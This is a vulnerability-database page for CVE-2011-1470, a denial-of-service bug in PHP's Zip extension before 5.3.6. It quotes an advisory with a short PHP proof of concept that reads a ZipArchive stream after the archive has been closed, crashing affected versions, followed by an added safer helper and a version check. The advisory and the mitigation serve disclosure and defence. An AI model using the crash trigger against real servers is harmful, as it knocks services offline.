PHP 5.3.x 'Zip' Extension Denial of Service vulnerability
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
NVD | CVE-2011-1470 | 20 Mar 2011 02:00 | – | nvd |
Prion | Code injection | 20 Mar 2011 02:00 | – | prion |
UbuntuCve | CVE-2011-1470 | 19 Mar 2011 00:00 | – | ubuntucve |
seebug.org | PHP "Zip" extension "stream_get_contents()" function denial-of-service vulnerability | 27 Mar 2011 00:00 | – | seebug |
CVE | CVE-2011-1470 | 20 Mar 2011 02:00 | – | cve |
Cvelist | CVE-2011-1470 | 20 Mar 2011 01:00 | – | cvelist |
Tenable Nessus | SuSE 10 Security Update : PHP5 (ZYPP Patch Number 7553) | 13 Dec 2011 00:00 | – | nessus |
Tenable Nessus | SuSE 10 Security Update : PHP5 (ZYPP Patch Number 7554) | 17 Jun 2011 00:00 | – | nessus |
Tenable Nessus | SuSE 11.1 Security Update : PHP5 (SAT Patch Number 4663) | 17 Jun 2011 00:00 | – | nessus |
Tenable Nessus | openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2011:0645-1) | 13 Jun 2014 00:00 | – | nessus |
source: https://www.securityfocus.com/bid/46969/info
PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension.
Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.
Versions prior to PHP 5.3.6 are vulnerable.
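```php
<?php
// Entry to look up inside the archive
$target_file = 'META-INF/MANIFEST.MF';
$za = new ZipArchive();
if ($za->open('test.jar') !== TRUE)
{
    return FALSE;
}
if ($za->statName($target_file) !== FALSE)
{
    // Stream handle that refers to an entry inside the open archive
    $fd = $za->getStream($target_file);
}
else
{
    $fd = FALSE;
}
// The archive is closed while $fd is still held
$za->close();
if (is_resource($fd))
{
    // Reading the stream after close() is the step that crashes affected versions
    echo strlen(stream_get_contents($fd));
}
?>
```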
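An added example, not part of the original advisory or of PHP's own code: the same lookup as the proof of concept above, ordered so that the stream is consumed and released before the archive is closed. The function name `read_zip_entry` and the 1 MiB size cap are assumptions made for illustration.

```php
<?php
/**
 * Hypothetical helper: returns the entry's bytes, or null on any failure.
 * $maxBytes is an assumed cap so an oversized entry cannot exhaust memory.
 */
function read_zip_entry($archivePath, $entryName, $maxBytes = 1048576)
{
    $za = new ZipArchive();
    if ($za->open($archivePath) !== true) {
        return null;                     // not a readable archive
    }

    $data = null;
    $stat = $za->statName($entryName);
    if ($stat !== false && $stat['size'] <= $maxBytes) {
        $fd = $za->getStream($entryName);
        if (is_resource($fd)) {
            // Consume the stream while $za is still open. Ask for one byte
            // more than the cap so an entry whose declared size understates
            // its real size is detected and rejected.
            $buf = stream_get_contents($fd, $maxBytes + 1);
            fclose($fd);                 // release the stream first
            if ($buf !== false && strlen($buf) <= $maxBytes) {
                $data = $buf;
            }
        }
    }

    $za->close();                        // close the archive last
    return $data;
}

// The advisory states that versions prior to PHP 5.3.6 are vulnerable.
if (version_compare(PHP_VERSION, '5.3.6', '<')) {
    error_log('PHP ' . PHP_VERSION . ' predates 5.3.6; upgrade the runtime.');
}

// Same archive and entry names as the proof of concept.
$manifest = read_zip_entry('test.jar', 'META-INF/MANIFEST.MF');
echo $manifest === null ? "entry not read\n" : strlen($manifest) . "\n";
```

Reordering the calls only keeps application code off the crashing path; the advisory's remedy for the flaw itself is running PHP 5.3.6 or later.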